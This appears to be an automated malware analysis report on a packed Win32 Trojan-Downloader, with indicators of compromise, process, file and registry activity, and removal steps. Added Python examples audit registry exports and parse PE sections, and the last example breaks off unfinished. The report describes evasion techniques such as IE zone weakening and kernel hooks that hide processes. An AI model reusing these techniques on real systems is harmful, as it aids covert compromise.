HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Graftor.181159 (B) (Emsisoft), Gen:Variant.Graftor.181159 (AdAware), Trojan-Downloader.Win32.Karagany.1.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: 8a082618de41b5f732173d81d516b4ef
SHA1: 6f1557cb1910831ccfcedc375fd4fa7966fb2a13
SHA256: 8fa28f799587fc2ff38a9c8880855e39f708e4a474246a29a676ccbef028c788
SSDeep: 12288:XU9OQl4SuMC1 It8ix/TlqlB zp19bg4YStrskcaVHHrE0JoS:XUrlRP0px/TlqlB l1xfYStrfca
Size: 484864 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPX (Compresor Gratuito, www.upx.sourceforge.net); UPolyX v0.5 (reported as UPolyXv05_v6)
Company: no certificate found
Created at: 2015-03-23 18:43:45
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ndis500.exe:3740
appmon.exe:2132
MiniIE.exe:1256
ndsqp.exe:3824
audiodg.exe:2216
yum.exe:3540
The Trojan injects its code into the following process(es):
Cattle.exe:2188
%original file name%.exe:996
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process ndis500.exe:3740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\gYhxYl3.sys (22 bytes)
%System%\vrPCEc2 (1830 bytes)
The Trojan deletes the following file(s):
%System%\gYhxYl3.sys (0 bytes)
%WinDir%\ax01.da0 (0 bytes)
%System%\vrPCEc2 (0 bytes)
The process appmon.exe:2132 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\adbWinpi.dll (304 bytes)
%Documents and Settings%\%current user%\Application Data\Cattle.exe (3726 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinApi.dll (96 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinUsbApi.dll (60 bytes)
%Documents and Settings%\%current user%\Application Data\TscServer.exe (1653 bytes)
The process ndsqp.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\jBkaBo6.sys (22 bytes)
%System%\yuSFHf5 (12 bytes)
The Trojan deletes the following file(s):
%System%\jBkaBo6.sys (0 bytes)
%System%\yuSFHf5 (0 bytes)
The process %original file name%.exe:996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\262792\svchost.exe (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26279\svchost.exe (1629 bytes)
The process audiodg.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\clk.ini (103 bytes)
%WinDir%\run.bat (196 bytes)
%System%\cBLK.dll (2145 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hit.gemius[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pass.yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@insurance[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
Registry activity
The process Cattle.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 58 62 76 4B 62 56 12 27 31 AD D2 B9 F4 41 DF"
The process ndis500.exe:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 4B 82 8D 93 F2 BA 8D 01 58 74 8C 57 D2 E1 89"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies the IE security-zone map so that all local (intranet) sites not assigned to another zone are placed in the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies the IE security-zone map so that all network paths (UNC paths) are placed in the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are placed in the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\uOwZ216\Security]
[HKLM\System\CurrentControlSet\Services\uOwZ216]
[HKLM\System\CurrentControlSet\Services\uOwZ216\Enum]
The process appmon.exe:2132 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 CD 43 1E B1 C9 B1 0B B4 F3 A3 5C 4E C7 A1 57"
The process MiniIE.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 52 03 7F 5D B2 C6 4D 32 11 88 3B 68 99 67 7B"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"
[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\KeS\MiniIE.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"
The process ndsqp.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA FA BE 37 55 0D 1D BB 16 77 C6 E2 93 24 30 39"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies the IE security-zone map so that all local (intranet) sites not assigned to another zone are placed in the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies the IE security-zone map so that all network paths (UNC paths) are placed in the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are placed in the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\xRzC549]
[HKLM\System\CurrentControlSet\Services\xRzC549\Enum]
[HKLM\System\CurrentControlSet\Services\xRzC549\Security]
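The ZoneMap values written by ndis500.exe and ndsqp.exe above, together with the Internet-zone action 1601 ("Submit non-encrypted form data") that MiniIE.exe sets to 0 (Enable), are the kind of IE weakening that is easy to audit offline from a regedit export. The following is an added example (not Lavasoft's code, and not part of the report) that parses the subset of .reg syntax needed and reports any watched value present with the weakening setting. The export text is constructed to mirror the values listed above. One caveat a practitioner should keep in mind: the three ZoneMap values correspond to the check boxes in IE's "Local intranet" dialog and a value of 1 is also what IE writes when those boxes are checked, so on their own they are a weak indicator; the 1601 = 0 setting under HKLM is the more unusual one.

```python
import re

# Settings this page shows the sample writing, keyed by (normalized key path, value name),
# mapped to the value that matters and what IE does with it. The hive prefix is kept
# because ZoneMap lives under HKCU while Zones\3 here is written under HKLM.
WATCH = {
    (r"hkcu\software\microsoft\windows\currentversion\internet settings\zonemap", "intranetname"):
        ("1", "local (intranet) sites not assigned to another zone are placed in the Intranet zone"),
    (r"hkcu\software\microsoft\windows\currentversion\internet settings\zonemap", "uncasintranet"):
        ("1", "all UNC network paths are placed in the Intranet zone"),
    (r"hkcu\software\microsoft\windows\currentversion\internet settings\zonemap", "proxybypass"):
        ("1", "all sites that bypass the proxy server are placed in the Intranet zone"),
    (r"hklm\software\microsoft\windows\currentversion\internet settings\zones\3", "1601"):
        ("0", "Internet zone action 1601 (submit non-encrypted form data) set to Enable"),
}

HIVES = {"hkey_current_user": "hkcu", "hkey_local_machine": "hklm",
         "hkey_classes_root": "hkcr", "hkey_users": "hku"}


def normalize_key(key: str) -> str:
    """Lower-case the path and shorten the hive name so exports and live reads compare equal."""
    hive, sep, rest = key.lower().partition("\\")
    return HIVES.get(hive, hive) + sep + rest


def parse_reg_export(text: str) -> dict:
    """Parse the subset of .reg (regedit export) syntax used here:
    [key] headers, "name"=dword:hex and "name"="string"; other value types are kept verbatim."""
    entries = {}
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = normalize_key(line[1:-1])
            entries.setdefault(key, {})
            continue
        m = re.match(r'^(?:"((?:[^"\\]|\\.)+)"|@)=(.*)$', line)
        if not m or key is None:
            continue
        name = (m.group(1) or "").lower()
        val = m.group(2)
        if val.lower().startswith("dword:"):
            value = str(int(val[6:], 16))
        elif len(val) >= 2 and val[0] == '"' and val[-1] == '"':
            value = val[1:-1]
        else:
            value = val
        entries[key][name] = value
    return entries


def audit(entries: dict) -> list:
    """Return one finding per watched value that is present with the weakening setting."""
    findings = []
    for (key, name), (bad_value, meaning) in WATCH.items():
        value = entries.get(key, {}).get(name)
        if value == bad_value:
            findings.append(f"{key}\\{name} = {value}: {meaning}")
    return findings


# Constructed regedit export mirroring the values listed above (not taken from an infected host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"=dword:00000001
"UNCAsIntranet"=dword:00000001
"ProxyBypass"=dword:00000001
"AutoDetect"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"1601"=dword:00000000
'''

if __name__ == "__main__":
    for finding in audit(parse_reg_export(SAMPLE_REG)):
        print(finding)
```

To use it on a real host, export the two keys with `reg export` (or `regedit /e`) on the machine and feed the file to `parse_reg_export`; the same `WATCH` table can be extended with the other IE values this report lists (TabProcGrowth, DisableDeleteBrowsingHistory).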
The process %original file name%.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D BF D3 46 03 3B 69 46 E3 3C 80 1C 9E 3E C3 F0"
The process audiodg.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 F4 D8 59 52 8A 7F 9C 80 83 87 7B 2B D0 D7 B1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"TabProcGrowth" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"DisableDeleteBrowsingHistory" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"
The process yum.exe:3540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\KeS\sys32\urlnav.dll"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"
[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"
[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"
[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 BE 5A 31 A2 A1 21 2D C5 A3 98 9E 1C D0 CE CF"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\KeS\sys32\urlnav.dll"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\KeS\sys32\"
Dropped PE files
MD5 | File path |
---|---|
8e1c47c30dba5d88699b2a1107be7e3d | c:\Documents and Settings\"%CurrentUserName%"\Application Data\9JonVu.dll |
01e65067a6070e8f18609886e52bef38 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WaPZAC.exe |
000b3d8a037c797ed4482418c50f8a56 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\x6w8DF.dll |
2b383b8e15eefb852d4c926a205785fe | c:\Documents and Settings\"%CurrentUserName%"\Application Data\xwiR0J.dll |
287e0b871129d02e71b0d376bd8bef6c | c:\Documents and Settings\"%CurrentUserName%"\Application Data\yOkNJW.dll |
f8eae7b3a0efaeac7e49d3bb61d34afd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\262792\svchost.exe |
cd0b75bc3eb6ca85cacce02aea253055 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\26279\GWkgpu.nxx |
4116d723ede52ee003b2a7454334453d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\26279\svchost.exe |
f6bb20d5d513f6e1e95557eb61de8324 | c:\WINDOWS\KeS\MiniIE.exe |
5db345ec4edd409b5cc18c6c56352360 | c:\WINDOWS\KeS\sys32\urlnav.dll |
6f089346e6a6a5fbbc9bfde8cab6c5d4 | c:\WINDOWS\KeS\yum.exe |
4540f263d05608dcd3eb0affc059bac5 | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks (consistent with the driver dropped to %System%\drivers\HideSys.sys and with the services uOwZ216 and xRzC549 whose registry keys are deleted above):
ZwOpenProcess
ZwQuerySystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan the system with an anti-rootkit tool first: the kernel-mode hooks on ZwQuerySystemInformation and ZwOpenProcess listed above can hide the processes below from Task Manager and prevent it from opening them.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ndis500.exe:3740
appmon.exe:2132
MiniIE.exe:1256
ndsqp.exe:3824
audiodg.exe:2216
yum.exe:3540
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\gYhxYl3.sys (22 bytes)
%System%\vrPCEc2 (1830 bytes)
%Documents and Settings%\%current user%\Application Data\adbWinpi.dll (304 bytes)
%Documents and Settings%\%current user%\Application Data\Cattle.exe (3726 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinApi.dll (96 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinUsbApi.dll (60 bytes)
%Documents and Settings%\%current user%\Application Data\TscServer.exe (1653 bytes)
%System%\jBkaBo6.sys (22 bytes)
%System%\yuSFHf5 (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\262792\svchost.exe (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26279\svchost.exe (1629 bytes)
%System%\clk.ini (103 bytes)
%WinDir%\run.bat (196 bytes)
%System%\cBLK.dll (2145 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 335872 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 339968 | 483328 | 482816 | 5.54469 | ef47ba33313ada4919d252635d589320 |
UPX2 | 823296 | 4096 | 1024 | 1.77366 | 9b91b9a2651981ae286741309aeaab44 |
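The section table above is the classic UPX shape: UPX0 has 335872 bytes of virtual size but no raw data (its MD5 is the MD5 of the empty string), UPX1 holds the compressed image, and UPX2 is a small trailer. The following added example (written for this page, not Lavasoft's tooling) parses a PE section table with nothing but the standard library, computes the same per-section entropy and MD5 columns, and applies the packer heuristics a triage script would use. Because the original sample is not reproduced here, the input is a constructed three-section PE32 image that mimics the layout of the table; the virtual addresses and sizes are approximations, and the UPX1 contents are deterministic pseudo-random bytes standing in for compressed code.

```python
import hashlib
import math
import struct

# Section header layout from the PE/COFF specification (40 bytes):
# Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics.
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, close to 8.0 for compressed or encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk the section table and compute the same per-section facts as the table above."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(num_sections):
        fields = SECTION_HDR.unpack_from(pe, table + i * SECTION_HDR.size)
        name, vsize, vaddr, rsize, rptr, _, _, _, _, chars = fields
        raw = pe[rptr:rptr + rsize] if rsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr,
            "virtual_size": vsize,
            "raw_size": rsize,
            "entropy": round(shannon_entropy(raw), 5),
            "md5": hashlib.md5(raw).hexdigest(),
            "characteristics": chars,
        })
    return sections


def packer_indicators(sections: list) -> list:
    """Heuristics that flag a UPX-style layout: an empty RWX unpack target plus a dense code section."""
    findings = []
    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    for s in sections:
        if s["name"].startswith("UPX"):
            findings.append(f"{s['name']}: UPX section name")
        if s["raw_size"] == 0 and s["virtual_size"] >= 0x1000:
            findings.append(f"{s['name']}: no raw data but {s['virtual_size']} bytes virtual (unpack target)")
        if s["characteristics"] & rwx == rwx:
            findings.append(f"{s['name']}: writable and executable")
        if s["entropy"] > 7.0:
            findings.append(f"{s['name']}: entropy {s['entropy']} (compressed or encrypted data)")
    return findings


def build_sample_pe() -> bytes:
    """Constructed three-section PE32 image shaped like the UPX0/UPX1/UPX2 table above (not the real sample)."""
    rng = hashlib.sha256(b"constructed sample").digest()
    upx1 = b""
    while len(upx1) < 4096:            # deterministic pseudo-random bytes stand in for compressed code
        rng = hashlib.sha256(rng).digest()
        upx1 += rng
    upx2 = b"\0" * 1000 + b"UPX!" * 6  # mostly padding, like a small trailer section
    size_of_optional = 224             # PE32 optional header
    file_align = 0x200
    headers_len = 0x40 + 4 + 20 + size_of_optional + 3 * SECTION_HDR.size
    pad = (-headers_len) % file_align
    ptr1 = headers_len + pad
    ptr2 = ptr1 + len(upx1)
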